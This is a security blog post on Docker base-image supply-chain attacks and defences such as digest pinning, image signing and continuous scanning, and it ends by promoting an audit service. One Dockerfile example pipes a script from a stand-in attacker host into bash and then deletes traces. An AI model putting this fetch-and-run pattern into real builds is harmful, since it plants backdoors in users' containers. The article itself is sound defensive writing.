Back to Blog
Security11 min

Your Docker Base Image Is Someone Else's Code You Never Reviewed

Docker supply chain attacks exploit the trust teams place in base images. Typosquatting, poisoned layers, and phantom dependencies are real threats most teams ignore.

By Security TeamMarch 8, 2026

A fintech startup pulled node:18-alpine from Docker Hub every single build for two years. Nobody questioned it. Why would they? It's the official image. Maintained by the Node.js team. Scanned by Docker. Safe.

Except one Friday, a developer fat-fingered nodejs:18-alpine into a new microservice Dockerfile. Note the missing hyphen. That image existed on Docker Hub. Someone had uploaded it seven months earlier. It contained a perfectly functional Node.js runtime — plus a cryptocurrency miner that activated after 72 hours.

Took them eleven days to notice the CPU spike.

Nobody Reads the Dockerfile After It Works

This is the uncomfortable reality of container security. Teams obsess over runtime vulnerabilities, network policies, pod security contexts — all valid concerns. But the foundation of every container is a FROM statement, and that statement is an act of faith. You're saying "I trust whoever built this image, and everyone who contributed to every layer beneath it, and the registry that served it to me, and the network path it traveled." That's a lot of trust for a single line of code.

Docker Hub hosts over 15 million repositories. The verified publisher program covers maybe a few hundred. Everything else? Anyone can upload anything. And the naming system is first-come-first-served.

Typosquatting Isn't Just a npm Problem

Package registries learned this lesson years ago. crossenv vs cross-env on npm caught thousands of installs before someone noticed. Docker Hub has the exact same problem but with higher stakes — a malicious Docker image runs with whatever privileges your container runtime grants it.

Common typosquat patterns that have actually been found in the wild:

# Real image
FROM python:3.11-slim

# Typosquats that have existed at various points
FROM pytohn:3.11-slim
FROM python3:3.11-slim
FROM pyhton:3.11-slim

# Namespace confusion
FROM library/nginx    # Official
FROM nginx/nginx      # Could be anyone

Docker's "official images" live in the library/ namespace, but most developers just type nginx or python without thinking about namespaces at all. The resolution logic handles it. Usually.

What's Actually Inside That Layer?

A Docker image is a stack of filesystem layers. Each layer is a tar archive. When you pull ubuntu:22.04, you're downloading layers built by Canonical's build system, pushed to Docker Hub, stored on their CDN. But here's the thing — you can't see what happened during the build just by inspecting the image.

Run docker history on any image. You'll see the commands that were used. But RUN commands that download and delete files in the same layer leave no trace in the final filesystem. This is well-known and totally legitimate for reducing image size. It's also exactly how you'd hide a backdoor.

RUN curl -sL https://attacker.com/payload.sh | bash &&     rm -f /tmp/payload.sh &&     # payload already installed a systemd service or cron job
    # or modified an existing binary
    # nothing suspicious left in this layer's diff
    echo "done"

The Codecov breach in 2021 used a similar technique. Attackers modified a bash uploader script that thousands of CI pipelines downloaded and executed. It ran, exfiltrated credentials, and left minimal traces.

Pinning Tags Doesn't Fix This

Security guides always recommend pinning image versions. Use node:18.19.0-alpine3.19 instead of node:latest. Good advice. But tags are mutable. The image behind node:18.19.0-alpine3.19 can change. The maintainer can push a new build to the same tag, and your next docker pull gets different bits.

This happens legitimately all the time — security patches to base OS packages get rolled into existing tags. But it means tag pinning is a suggestion, not a guarantee.

Digest pinning is the actual answer:

# Tag pinning - mutable, can change underneath you
FROM node:18.19.0-alpine3.19

# Digest pinning - immutable, cryptographically verified
FROM node@sha256:a1b2c3d4e5f6...

# Best practice - both for readability AND security
FROM node:18.19.0-alpine3.19@sha256:a1b2c3d4e5f6...

Most teams don't do this. It's ugly. It breaks when you want to update. You need tooling to manage the digests. But it's the only way to guarantee you're getting the exact same image every time.

Multi-Stage Builds Create Invisible Trust Chains

Multi-stage builds made Dockerfiles cleaner and images smaller. They also made supply chain attacks harder to spot.

# Stage 1: build
FROM golang:1.21 AS builder
COPY . .
RUN go build -o /app

# Stage 2: runtime
FROM alpine:3.19
COPY --from=builder /app /app
CMD ["/app"]

Looks clean. But golang:1.21 brings in the entire Go toolchain — compilers, linkers, standard library. If any of that is compromised, your compiled binary is compromised. And the final image is just alpine:3.19 plus your binary. No Go toolchain to scan. No build tools to audit. The attack surface existed during build time and disappeared.

The SolarWinds attack worked exactly like this, conceptually. Compromise the build environment, not the final artifact. By the time anyone looks at what shipped, the malicious tools are gone.

Private Registries Are Not Automatically Safer

Moving to a private registry (ECR, GCR, ACR, Harbor) solves the typosquatting problem. It does not solve the "what's inside the image" problem. Unless you're building every image from scratch — including the OS base — you're still pulling upstream images and trusting them.

What actually helps:

# 1. Scan on push, not just on pull
# Most registries support this natively now
# ECR: enable Enhanced scanning (Inspector-based)
# GCR: Artifact Analysis is on by default
# Harbor: Trivy or Clair integration

# 2. Admission controllers that enforce signatures
# Cosign + Sigstore for signing
cosign sign --key cosign.key registry.example.com/myapp:v1.2.3

# Kubernetes policy that rejects unsigned images
# (Kyverno example)
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
  name: verify-image-signatures
spec:
  rules:
    - name: check-signature
      match:
        resources:
          kinds: ["Pod"]
      verifyImages:
        - imageReferences: ["registry.example.com/*"]
          attestors:
            - entries:
                - keys:
                    publicKeys: |-
                      -----BEGIN PUBLIC KEY-----
                      ...
                      -----END PUBLIC KEY-----

Sigstore adoption is growing fast. GitHub Actions supports it natively for container builds since late 2023. But adoption across the industry is still maybe 10-15% of organizations running Kubernetes in production. Generous estimate.

The SBOM Problem Nobody Talks About

Software Bill of Materials. The cybersecurity executive order made everyone generate them. Docker even built docker sbom into the CLI (via Syft). Generate an SBOM for any image in seconds.

Great. Now what?

An SBOM tells you what packages are in the image. It doesn't tell you if those packages were tampered with. It doesn't tell you if the build process was compromised. It doesn't tell you if the image was modified after the SBOM was generated. It's an inventory list written by the person you're trying to verify.

SBOMs are useful for vulnerability tracking. For supply chain security, they're necessary but nowhere near sufficient. You need attestations about the build process itself — provenance information that says "this image was built by this CI system, from this source commit, using these tools, and here's a cryptographic proof." SLSA (Supply-chain Levels for Software Artifacts) defines the framework. Most organizations are at SLSA Level 1 at best.

Practical Steps That Actually Reduce Risk

Forget the theoretical perfect setup. Here's what moves the needle for real teams shipping real code:

Use distroless or scratch base images where possible. Fewer packages means fewer things to compromise. Google's distroless images contain just the runtime — no shell, no package manager, no curl. An attacker who gets code execution in a distroless container can't apt-get install their toolkit.

Pin by digest, update deliberately. Use Dependabot or Renovate to propose digest updates as PRs. Review what changed. Yes, it's more work than :latest. That's the point.

Scan continuously, not just at build time. New CVEs get published daily. An image that was clean last Tuesday might have three criticals today. Continuous scanning tools (Snyk Container, Trivy Operator, Prisma Cloud) monitor deployed images.

Build reproducibly. If two people build the same Dockerfile from the same commit and get different images (different digests), you can't verify anything. Reproducible builds are hard — timestamps, file ordering, and compiler randomization all conspire against you — but they're the foundation of verifiable software.

Automated Container Scanning

Manual review of Docker images doesn't scale past a handful of services. ScanMyCode.dev runs automated security scans on your containerized applications — Dockerfile misconfigurations, vulnerable base image packages, exposed secrets in layers, and insecure runtime settings. You get a report with exact issues, severity ratings, and remediation steps. Not a 200-page PDF that nobody reads.

Stop Trusting, Start Verifying

Every FROM line in every Dockerfile is a dependency. Treat it like one. Would you add a random npm package without checking its maintainers, download count, and source code? Then don't pull a random Docker image just because the name looks right.

The supply chain is only as strong as the weakest docker pull in your CI pipeline. Find out what you're actually running. Get a Docker security audit — full report within 24 hours, covering base images, build configuration, and runtime security posture.

dockersupply-chaincontainer-securitybase-imagesvulnerability-scanning

Ready to improve your code?

Get an AI-powered code audit with actionable recommendations. Results in 24 hours.

Start Your Audit